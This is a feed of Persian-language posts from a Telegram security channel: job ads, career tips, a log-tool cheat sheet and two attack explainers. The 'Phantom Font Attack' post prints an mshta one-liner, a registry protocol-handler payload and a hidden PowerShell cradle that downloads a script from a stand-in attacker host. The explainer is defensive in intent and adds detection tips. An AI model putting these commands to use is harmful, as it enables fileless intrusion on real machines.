Network Security Channel – Telegram
Network Security Channel
2.54K subscribers
5.33K photos
3.42K videos
5.56K files
4.43K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
#فرصت_شغلی
#مانیتورینگ
#zabbix
#noc

سلام به دوستان و همکاران عزیز
یک شرکت خصوصی در حوزه ی بانکی ، جهت تکمیل نیروی فنی واحد مانیتورینگ شبکه و سرویس ، از افراد واجد شرایط زیر دعوت به همکاری می‌نماید:

عنوان شغلی: کارشناس توسعه ی مانیتورینگ

وظایف:
توسعه و نگهداری سامانه ی مانیتورینگ زبیکس

مهارت‌ها و توانایی‌ها:
تسلط بر نرم‌افزار مانیتورینگ Zabbix
توانایی مانیتور کردن شبکه و زیرساخت ، دیتابیس ها ، اپلیکیشن ها و سرویس ها با نرم‌افزار زبیکس
آشنایی با مفاهیم لینوکس در حد مدرک LPIC-1
آشنایی با ELK
توانایی تحلیل مشکلات شبکه و سرورها
دقت و مسئولیت‌پذیری بالا

آشنایی با دوره‌های splunk ، ccna و grafana مزیت محسوب‌ میشود.



لطفا رزومه ی خود را از طریق دایرکت لینکدین و یا سایت جابینجا ارسال بفرمایید.

https://jobinja.ir/1391768


🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
#دعوت_به_همکاری
با سلام ؛
مجموعه‌ی ارویس جهت تکمیل کادر فنی خود از کارشناسان واجد شرایط زیر دعوت به همکاری مینماید :

۱-تسلط به مباحث زیرساخت شبکه در سطح CCNP
۲-آشنا با فایروال ها از جمله Sophos و Fortigate
۳-آشنایی کلی با سرویس های ماکروسافتی
۴-اتمام و یا معافیت خدمت سربازی


مزایا:بیمه تکمیلی و ناهار
ساعت کاری : ۷ الی ۱۶

برای ارسال رزومه به شرکت تماس بگیرید

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
وقتی اعضای تیم #المپیادنجوم فهمیدند هر پنج نفر #طلا بردند.

اعضای تیم ایران در این رقابت‌ها شامل حسین سلطانی، هیربد فودازی، حسین معصومی، ارشیا میرشمسی کاخکی و علی نادری لردجانی هستند که توانستند با کسب ۵ نشان طلا، قهرمان مسابقات جهانی هند ۲۰۲۵ شوند.

امیدوارم عالی باشند و سالم

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
4
🎯 حمله سایبری APT29 با C2 نامرئی – ترکیب CDN، HTTP/3 و DoH

در سال ۱۴۰۲، سازمان امنیت ملی آمریکا و شرکت امنیتی Mandiant اعلام کردند که گروه هکری APT29، وابسته به سرویس اطلاعات خارجی روسیه، موفق شده‌اند به یکی از نهادهای دیپلماتیک ایالات متحده نفوذ کنند.
آنچه این عملیات را به یکی از پیچیده‌ترین حملات سایبری اخیر تبدیل کرد، زیرساخت فرماندهی و کنترل (C2) آن بود که عملا از دید هر سیستم مانیتورینگ پنهان مانده بود.

فاز اول – پنهان‌سازی C2 پشت شبکه توزیع محتوا (CDN)

به جای استفاده از یک سرور C2 مستقیم، مهاجمان دامنه‌ای مشابه سرویس‌های به‌روزرسانی رسمی ثبت کردند و آن را از طریق Cloudflare به سرور واقعی خود مسیردهی کردند.
مزیت این کار:

تمام ارتباطات با C2 در قالب ترافیک HTTPS معتبر به یک CDN شناخته‌شده انجام می‌شد.
سیستم‌های امنیتی مقصد فقط «cloudflare.com» را به عنوان مقصد می‌دیدند.
امکان بلاک کردن ترافیک بدون اختلال گسترده در سرویس‌های دیگر تقریبا وجود نداشت.


فاز دوم – استفاده از پروتکل HTTP/3 مبتنی بر QUIC

به جای HTTP/1.1 یا HTTP/2، مهاجمان از HTTP/3 روی بستر QUIC بهره بردند.
این انتخاب چند مزیت حیاتی داشت:

برقراری ارتباط روی UDP/443 به جای TCP، که بسیاری از ابزارهای NIDS/IPS به‌خوبی آن را تحلیل نمی‌کنند.
رمزگذاری لایه حمل به شکلی که حتی پس از TLS Inspection، الگوهای ترافیکی شناسایی‌پذیر نباشند. امکان تغییر مسیر و زیرساخت با حداقل وقفه در صورت شناسایی.

فاز سوم – مخفی‌سازی درخواست‌های DNS با DoH

در این روش، درخواست‌های DNS سنتی روی پورت ۵۳ حذف شده و به جای آن از DNS over HTTPS استفاده شد.
به این ترتیب:

هر Query به شکل یک درخواست HTTPS رمزگذاری‌شده به سرور DoH (مثلاً cloudflare-dns.com) ارسال می‌شد.
هیچ لاگ قابل‌مشاهده‌ای در DNS Resolver سازمان مقصد وجود نداشت.
تشخیص دامنه‌های مخرب از روی ترافیک شبکه به‌شدت دشوار شد.

فاز چهارم – بارگذاری و اجرای Implant

مهاجمان از طریق فایل‌های فیشینگ (ISO یا Word با ماکرو)، یک Implant نوشته‌شده با Golang را روی سیستم قربانی مستقر کردند.
ویژگی‌های این Implant:

کراس‌پلتفرم بودن (Windows/Linux)
فشرده‌سازی با UPX برای جلوگیری از شناسایی توسط آنتی‌ویروس‌ها
برقراری Beacon نامنظم به دامنه C2 از طریق HTTP/3 و DoH
پشتیبانی از اجرای فرمان، استخراج فایل‌ها و حرکت جانبی (Lateral Movement) در شبکه داخلی

فاز پنجم – فرار از شناسایی

ترکیب این سه تکنیک (CDN + HTTP/3 + DoH) باعث شد:

ترافیک C2 با ترافیک عادی مرورگرها یکسان به نظر برسد.
ابزارهای امنیتی سنتی هیچ الگوی مشخصی از Beaconing پیدا نکنند.
حتی تحلیل‌گران SOC، بدون استفاده از روش‌های پیشرفته تحلیل متادیتا، نتوانند ارتباطات مخرب را از عادی تفکیک کنند.

روش‌های شکار (Threat Hunting)

برای مقابله با چنین حملاتی، نیاز به پایش سطح پیشرفته وجود دارد:

پروفایل‌سازی ترافیک QUIC و شناسایی ارتباطات غیرمرورگری روی UDP/443
بررسی Fingerprintهای TLS/JA3 و مقایسه با مرورگرهای استاندارد
تحلیل طول بسته‌ها و فواصل زمانی ارسال آن‌ها (Traffic Flow Analysis)
ایجاد لیست سفید برای سرورهای DoH و مسدودسازی موارد غیرمجاز

📌 نتیجه‌گیری:
این حمله نشان می‌دهد که گروه‌های پیشرفته (APT) دیگر نیازی به دامنه‌های مشکوک یا پورت‌های غیرمعمول ندارند.
امروز، زیرساخت‌های قانونی مثل Cloudflare، Akamai و پروتکل‌های مدرن مانند HTTP/3 و DoH می‌توانند به راحتی به سپر نامرئی برای C2 مهاجمان تبدیل شوند.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
ما در Barook | باروک دنبال یه نگهبان سایبری #Cyber_Security پرشور می‌گردیم!
اگر تو از اونایی هستی که با کشف یه آسیب‌پذیری ذوق می‌کنی، از خنثی کردن تهدیدات سایبری کیف می‌کنی و عاشق اینی که شبکه‌ها و سیستم‌ها رو مثل یه قلعه نفوذ ناپذیرکنی🛡، جای تو توی تیم ما خالیه!

🔶چی ازت می‌خوایم؟
🔹تسلط به ابزارهای امنیتی مثل Nessus، Nmap،فایروال‌ها و سیستم‌های SIEM
🔹تجربه واقعی کار با تهدیدات سایبری (نه فقط سناریوهای تمرینی)
🔹آشنایی با استانداردهای امنیتی مثل ISO 27001، NIST یا CIS
🔹مهارت تو تست نفوذ، تحلیل ریسک و مستندسازی حرفه‌ای
🔹خلاقیت تو پیدا کردن راهکارهای امنیتی و حل مسئله
🔹روحیه تیمی و توانایی کار تو محیط سریع و پرچالش

🔷چی برات داریم؟
🔸یه تیم باحال، حرفه‌ای و بدون حاشیه
🔸فضای رشد، یادگیری و دیده شدن ایده‌هات
🔸پروژه‌هایی که واقعاً امنیت سازمان رو متحول می‌کنن
🔸ساعت کاری منعطف و محیطی که توش راحتی

حس می‌کنی این شغل برات ساخته شده؟
بیا با هم دنیای سایبری رو امن‌تر کنیم!
📩 رزومه‌تو بفرست به لینک زیر یا یه پیام بده که بتونیم گپ بزنیم.
https://B2n.ir/yq7413
#استخدام
#کارشناس_امنیت_فناوری_اطلاعات
#IT_Security_Specialist
#Cyber_Security

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
1
سلام
تیم Ciclo (استارتاپ فعال گروه گلرنگ ونچرز) دنبال دو هم‌تیمی پرانرژی هست تا با هم مسیر رشد و توسعه اپلیکیشنمون رو جلو ببریم! اگر تجربه یا علاقه دارید تو فضای استارتاپی کار کنید، خوشحال می‌شیم پیام بدید.

موقعیت‌ها:
Front-end developer (React Native / PWA)
Back-end developer (Python / Django)

📩 رزومه‌تون رو می‌تونید به این آدرس بفرستید یا از طریق لینکدین با من در تماس باشید:
manihamzezadehz@gmail.com

#استخدام
#ریموت
#فرصت_شغلی
#استارتاپ
#Hiring
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
📜 راهنمای سریع ابزارهای تحلیل لاگ (Log Parsing Cheat Sheet)

🔍 ابزارهای اصلی تحلیل لاگ
1️⃣ GREP - جستجوی الگو در فایل‌ها
2️⃣ NGREP - تحلیل پکت‌های شبکه
3️⃣ CUT - استخراج فیلدهای ساختاریافته
4️⃣ SED - ویرایش و جایگزینی متن
5️⃣ SORT - مرتب‌سازی داده‌ها
6️⃣ UNIQ - حذف موارد تکراری
7️⃣ DIFF - مقایسه فایل‌ها
8️⃣ AWK - پردازش داده‌های پیشرفته

📂 ابزارهای مشاهده و مدیریت فایل‌ها
1️⃣ HEAD - نمایش ابتدای فایل
2️⃣ TAIL - نمایش انتهای فایل
3️⃣ LESS - مشاهده هوشمند فایل‌ها
4️⃣ COMM - مقایسه خطوط مشترک دو فایل

📊 ابزارهای تخصصی فرمت‌ها
1️⃣ CSVCUT - پردازش فایل‌های CSV
2️⃣ JQ - پردازش فایل‌های JSON
3️⃣ TR - جایگزینی کاراکترها
4️⃣ CCZE - رنگی‌سازی لاگ‌ها

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

#linux #Cybersecurity #log
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
2
بعضی‌ها رسماً به مرحله‌ای رسیدن که دارن «چیزهای رایگان» رو هم می‌فروشن!

این روزها نسخه آماده #Nessus از طریق #Docker رایگان و در دسترس همه‌ست… ولی دیدم بعضی‌ها همین رو بسته‌بندی کردن و با قیمت بالا می‌دن به ملت 🤦‍♂️

هیچ جادوی خاصی پشتش نیست، فقط یک docker pull ساده‌ست!

واقعاً حیفه که وقت و پول مردم صرف چیزی بشه که با یک خط دستور میشه آورد بالا.

📂 لینک نسخه آماده روی Docker Hub:

https://hub.docker.com/r/sakurashiro/nessus

#nessus #docker #vulnerability_assessment #cybersecurity #infosec #soc #securitytools #redteam #blueteam #hide01

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
3👍3👏1🕊1
اگر تجربه کار با Laravel داری و زبان انگلیسیت خوبه,
جات توی تیم ما خالیه!
ما یک تیم استرالیایی هستیم که روی پروژه‌های بین‌المللی کار می‌کنیم و محیط کار کاملاً ریموت و دوستانه داریم.
شرایط کلی:
تسلط به Laravel و PHP
مهارت‌های خوب انگلیسی برای ارتباط با تیم و کلاینت‌ها
تعهد و روحیه تیمی
محل کار: ریموت (تمام‌وقت)
حقوق: بر اساس مهارت و تجربه
اگر علاقه‌مند هستید، فرم زیر را پر کنید تا با شما تماس بگیریم:

https://docs.google.com/forms/d/e/1FAIpQLScCvHwuSESc6tL9XuojivlSNWEVTJKNbMCr6E0Gpmrk3QyqiQ/viewform?usp=dialog

#استخدام #آگهي_شغلي #دوركاري #ريموت #برنامه_نويسي #فرصت_شغلي #لاراول #laravel #php

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
1
🎯 حمله فونت شبح (Phantom Font Attack): جایی که mshta.exe با رجیستری متحد می‌شود!

یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم می‌توانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!



🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟

پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایل‌های hta (HTML Application) طراحی شده است.
این فایل‌ها می‌توانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا می‌کند.

📌 محل پیش‌فرض:
C:\\Windows\\System32\\mshta.exe



چرا مهاجمان عاشق mshta.exe هستند؟

به‌صورت پیش‌فرض در ویندوز نصب است (Living Off The Land)
اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
اغلب در لیست سفید آنتی‌ویروس و EDR قرار دارد
ابزاری برای اجرای حملات Fileless و مخفیانه



📌 نمونه استفاده مخرب:


mshta.exe "javanoscript​ : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"




🧩 مراحل حمله فونت شبح:

1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت می‌کند (مثلاً CorpSans.ttf)
اما به‌جای فونت، یک فایل مشکوک .reg را دانلود می‌کند.

2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام fontview:// تعریف می‌کند.
و می‌گوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:


[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javanoscript​:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""


3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به fontview://load ریدایرکت می‌شود.
پراسس mshta.exe اجرا می‌شود، مقدار Payload از رجیستری خوانده می‌شود و PowerShell مخفیانه اجرا می‌شود:

javanoscript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);




🔍 چرا این حمله خطرناک است؟

Fileless → هیچ فایل اجرایی روی دیسک نیست
استفاده از ابزار قانونی ویندوز (mshta.exe)
ذخیره کد در رجیستری → بدون فایل مشکوک
اجرا به‌صورت Stealth (بدون پنجره و هشدار)



🛡 نکات مهم برای Blue Team:

🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر HKEY_CLASSES_ROOT و Protocol Handlerها را لاگ کنید
🔸 هر اجرای ناگهانی mshta بدون فایل .hta را بررسی کنید
🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک



🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!

#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
2👏2🔥1🎉1🤩1
هفت پلتفرم برای پیدا کردن شغل ریموت در ML/DL
ویژه مهندسان ایرانی

اگر ML/DL Engineer هستید و از ایران به دنبال فرصت‌های ریموت یا با ویزا می‌گردید، این ۷ پلتفرم رو از دست ندین.

1. Wellfound (قبلاً AngelList):
– پلتفرم استارتاپ‌ها.
– مستقیم به Founder/CTO پیام بدید و فیلتر Seed–Series B برای تیم‌های AI رو بزنید.
– پروفایلتون رو با GitHub لینک کنید!

2. RemoteOK:
– بورد ریموت با الرت روی کیوردهایی مثل "machine learning" یا "computer vision"
– تگ "Visa Sponsorship" رو اضافه کنید تا اولین اپلای‌کننده باشید.

3. Remotive :
– ریموت با فیلتر Time-Zone
– Newsletterشون رو subscribe کنید برای نقش‌های انحصاری.

4. We Work Remotely:
- جستجوی پیشرفته با "Worldwide + AI/ML"
– عالی برای نقش‌های senior با پروژه‌های واقعی مثل PyTorch.

5. Relocate.me:
– نقش‌های فنی با ویزا و relocation.
– فیلتر "Visa Sponsorship" بزنید، به خصوص برای کانادا/آلمان که برای ایرانی‌ها بازتره.

6. Landing.jobs:
– بورد اروپا (پرتغال‌محور).
– Assessmentهای فنی رو پاس کنید تا به pool بالاتری برید
– تمرین LeetCode-style برای ML algorithms مثل CNN.

7.iBRIDGES:
– شبکه ایرانیان خارج.
– از LinkedIn برای connect مستقیم با فاندرهای AI در اروپا/آمریکا استفاده کنید.


پیشنهاد:
این‌ها رو با LinkedIn ترکیب کنید، رزومه‌تون رو ATS-friendly کنید. یعنی رزومه طوری نوشته بشه که سیستم‌های غربالگری خودکار (Applicant Tracking System) بتوانند آن را به راحتی بخوانند و کلمات کلیدی مهم را شناسایی کنند.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21🔥1
یکی از دوستان نیازمند نیروی اندروید کار و IOS کار هست
اگر رزومه خوبی دارید به ایدی زیر رزومه تونو بفرستید
مشهد - دورکاری
@Developer_Network

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
دوستانی که قصد اموزش " نگارش مقاله "
به صورت تضمینی برای Q1
که به شدت سختگیرانه شده در دنیا رو دارند
به ایدی زیر از دوستان ما هستند اعلام امادگی کنند

نگارش این مقاله برای حوزه امنیت و IOT و هوش مصنوعی خواهد بود
و بخشی مربوط به پزشکی
که همچنان این مقالات در بالاترین رده ی علمی در دنیا یعنی Q1 هست ...

@Developer_Network

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21👏1🎉1👨‍💻1
استخدام گرافیست
مشهد
شرکت معتبر
حقوق و بیمه مزایا دارد...
لطفا روزمه رو به ایدی زیر ارسال کنید
@Developer_Network

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
🚨 هشدار امنیتی فوری 🚨
اخیراً اطلاعات ورود بسیاری از حساب‌های گوگل در اینترنت افشا شده است!
حتی اگر ورود دو مرحله‌ای رو برای حساب گوگل خود فعال کرده‌اید، باز هم لازم است همین حالا رمز عبور خود را تغییر دهید

🔒 برای امنیت بیشتر:
از رمز عبور قوی و غیرتکراری استفاده کنید

هر لحظه تأخیر ممکن است حساب شما را در معرض خطر قرار دهد.
👉 همین الان رمز عبور حساب گوگل خود را تغییر دهید

https://www.yahoo.com/news/articles/google-sounds-alarm-massive-data-174500558.html

https://www.forbes.com/sites/zakdoffman/2025/08/25/google-warns-most-gmail-users-must-change-passwords/

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21🤯1😱1
آیا پذیرش در دانشگاه‌های آمریکا هم سهمیه‌ای است؟
◾️دانشگاه‌های خصوصی: دانشگاه هاروارد، مثل خیلی از دانشگاه‌های برتر خصوصی، دو مسیر برای پذیرش دارد. یکی مسیر عادی که دانشجویان را بر اساس شایستگی‌های فردی ارزیابی می‌کند و مسیر دومی که دانشجویان را از طریق چهار سهمیه پذیرش می‌کند: ورزشکاران، Legacies (فرزندان فارغ‌التحصیلان)، Dean's Interest List (فرزندان ثروتمندان) و فرزندان اساتید. اگرچه جزئیات سهمیه‌بندی جایی گفته نمی‌شود، برآورد شده تا ۳۰ درصد پذیرفته‌شدگان هاروارد سهمیه‌ای هستند. این سهمیه‌ها البته بشدت به نفع سفیدپوستان استفاده می‌شدند.
◾️دانشگاه‌های دولتی: سهمیه‌بندی در دانشگاه‌های دولتی، به سبب رقابت کمتر، به ندرت وجود دارد. برای مثال سهمیه Legacy در اغلب دانشگاه‌های ایالتی غیرقانونی است. همینطور فرزندان اساتید سهمیه‌ای ندارند اما در صورت پذیرش، از تخفیف شهریه برخوردار می‌شوند. در این زمینه یک استثنا وجود داشت. با اوج گرفتن جنبش‌های مدنی در آمریکا از ۱۹۶۰ به بعد، دانشگاه‌ها شروع به سیاست‌گذاری‌هایی کردند تا شانس بیشتری به گروه‌هایی که بطور تاریخی محروم قرار گرفته‌اند داده شود. این مساله که به عنوان affirmative action شناخته می‌شد، سهمیه خاصی برای گروه‌های نژادی (خصوصا سیاه‌پوستان) تعریف می‌کرد.
◾️چالش‌های قانونی: در سال ۲۰۲۳ دادگاه عالی آمریکا رای به غیرقانونی بودن درنظرگیری نژاد بعنوان عاملی برای پذیرش در دانشگاه‌های آمریکا داد. حتی دانشگاه‌های خصوصی هم شامل این مساله شدند بطوریکه اگرچه سهمیه‌هایی که برای مثال در هاروارد ذکر شد همچنان پابرجا باقی مانده است، اما فاکتور نژاد باید از آن حذف شود. همچنین تعیین درصد ثابت برای هر نوع سهمیه‌ای غیرقانونی است.
◾️سهمیه نظامی‌ها: در دانشگاه‌های آمریکا سهمیه‌ای برای ارتشی‌ها و یا نظامی‌های آسیب‌دیده در جنگ و خانواده آن‌ها وجود ندارد اما چنین مواردی می‌تواند به عنوان امتیاز مثبت در فرآیند پذیرش در نظر گرفته شود.
◾️کلام آخر: بحث پذیرش در دانشگاه‌های آمریکا بسیار مفصل است و من اینجا صرفا در حد کشش یک پست لینکدین در مورد آن نوشتم. اما خوب است بگویم که اساسا در سیستم سرمایه‌داری آمریکا، پول در آموزش عالی، مثل هر زمینه‌ی دیگری، حرف اول و آخر را می‌زند، طوریکه می‌توانیم ضرب‌المثل معروف خودمان را اینطور بازگو کنیم که شما دانشجویی از خانواده پول‌دار باش، روی سبیل رئیس دانشگاه هاروارد نقاره بزن!

✍️دکتر قدرت ابادی

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍1🔥1👏1🎉1🕊1
سلام دوستان، ما در تیم‌مون دنبال یک #مهندس_DevOps حرفه‌ای، بااستعداد و پرانرژی به صورت #ریموت و #پارت_تایم هستیم.
برامون خیلی مهمه که در مهارت‌ها و ابزارهای گفته‌شده، تجربه‌ی واضح، عملی و قابل ارائه داشته باشین. بخاط همین نیازمندی ها رو لطفا با دقت بخونین و در صورت یکسان بودن رزومه تون با شرایط بهمون پیام بدین. وظایفی که از شما انتظار داریم:
طراحی، پیاده‌سازی و نگهداری CI/CD Pipeline‌ها برای بهبود فرآیند توسعه و استقرار
مدیریت و بهینه‌سازی زیرساخت‌های ابری و سرورها
مانیتورینگ، دیباگ و افزایش پایداری سیستم‌ها
همکاری نزدیک با تیم توسعه برای بهبود عملکرد و مقیاس‌پذیری سیستم‌ها مهارت‌های موردنیاز:
تسلط کامل به اجرای CI/CD در GitLab
مهارت بالا در مدیریت Containerها و Docker
آشنایی با مفاهیم و ابزارهای Backup هوشمند
آشنایی با مفاهیم امنیتی و شبکه
روحیه تیمی، مسئولیت‌پذیری و علاقه‌مندی به یادگیری مداوم
لطفاً رزومه‌ت به همراه دستمزد مدنظرت برای همکاری پارت‌تایم (ساعتی) رو برامون بفرست:
selectivest@gmail.com

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
دوره تیم قرمز مقدماتی گروه یک
دکتر رضا حسین زاده
دوشنبه ها ۱۰ شب ایران
شروع قطعی هفته اول مهر

@xcode0x

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
🤩3👍2🔥1👏1😱1🎉1
درود به همراهان گرامی
دوره لابراتوار CCIE بصورت آفلاین آماده اجرا شد اگر مایل بودید به این کلاس خاص بپیوندید چون هدفمون ادامه دوره در گرایشهای دیگر هم هست.

هماهنگی :
@xcode0x

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
2👍1🔥1😱1
این روزها که در مال‌های تهران قدم می‌زنم، شلوغی جمعیت (چه در کافه‌ها و چه در فروشگاه‌ها ) به‌وضوح به چشم می‌آید.

در شرایطی که مردم به‌واسطه اوضاع اقتصادی و احتمال جنگ باید بیشتر به پس‌انداز فکر کنند، آن‌ها را فوج‌فوج مشغول خرید یا کافه‌گردی‌های گران می‌بینم.

به‌تازگی، هنگام مطالعه کتاب «غریزه اراده» (The Willpower Instinct) نوشته کلی مک‌گونیگال، بخش «مدیریت وحشت» توجهم را جلب کرد.

طبق آنچه کتاب توضیح می‌دهد، می‌توان نتیجه گرفت که مردم پس از تجربه وحشت جنگ و اضطراب آینده، به‌طور ناخودآگاه به خرید و خرج‌کردن هجوم می‌آورند.

این مقوله در سایر رفتارهای انسانی هم دیده می‌شود

✍️نوروزی- مشاور امنیت سایبری

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍2😱2🔥1